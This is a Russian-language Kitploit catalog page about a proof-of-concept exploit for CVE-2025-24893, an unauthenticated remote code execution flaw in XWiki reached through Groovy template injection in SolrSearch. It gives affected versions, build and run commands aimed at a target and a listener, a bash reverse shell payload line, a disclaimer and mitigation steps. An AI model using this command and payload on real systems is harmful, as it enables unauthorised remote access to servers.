Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cve-2025-24893-poc — Эксплойт Proof-of-Concept для CVE-2025-24893 — неаутентифицированной уязвимости удалённого выполнения кода (RCE) в XWiki. Эксплуатирует недостаток внедрения шаблонов в конечной точке SolrSearch через выполнение Groovy-скриптов. | Kitploit
Инструменты/GitHubGitHub/investigato/cve-2025-24893-poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеРазработка Полезной Нагрузки
GitHubinvestigato/cve-2025-24893-poc

cve-2025-24893-poc

Эксплойт Proof-of-Concept для CVE-2025-24893 — неаутентифицированной уязвимости удалённого выполнения кода (RCE) в XWiki. Эксплуатирует недостаток внедрения шаблонов в конечной точке SolrSearch через выполнение Groovy-скриптов.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
1 год назадЕщё не проверено

CVE-2025-24893 — XWiki: неаутентифицированный RCE (PoC)

Эксплойт Proof-of-Concept для CVE-2025-24893 — критической неаутентифицированной уязвимости удаленного выполнения кода в XWiki.
Данный эксплойт использует внедрение Groovy-шаблона в конечную точку SolrSearch для выполнения произвольных команд — включая reverse shell — без аутентификации.

💥 Сведения об уязвимости

Недостаток в том, как XWiki обрабатывает специально сформированный ввод для RSS-конечной точки SolrSearch, позволяет злоумышленникам внедрять Groovy-код в конвейер рендеринга.
Это обеспечивает неаутентифицированный RCE через блоки сценариев {{groovy}}.

✅ Затронутые версии

  • < 15.10.11
  • >= 16.0.0 и < 16.4.1

❌ Исправлено в

  • 15.10.11
  • 16.4.1

🔧 Использование

Скачайте релиз:

Релизы

или соберите из исходников:

root@kitploit:~
cargo build --release
./target/release/cve-2025-24893-gato --url http://target --ip 10.10.10.10 --port 4444

Полезная нагрузка reverse shell

Здесь есть готовая полезная нагрузка reverse shell в таком виде:

bash -c 'sh -i >& /dev/tcp/{IP}/{PORT} 0>&1


⚠️ Правовое предупреждение

Этот код предназначен только для образовательных целей и авторизованных исследований в области безопасности. Не используйте этот эксплойт против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения.


✍️ Авторы

  • Эксплойт PoC от Artemir7
  • Порт на Rust от investigato

🛡️ Обнаружение и смягчение последствий

  • Обновитесь до XWiki 15.10.11 или 16.4.1+
  • Отслеживайте подозрительное использование /bin/get/Main/SolrSearch?media=rss
  • Отключите выполнение Groovy для анонимных пользователей, если это возможно
Скачать инструмент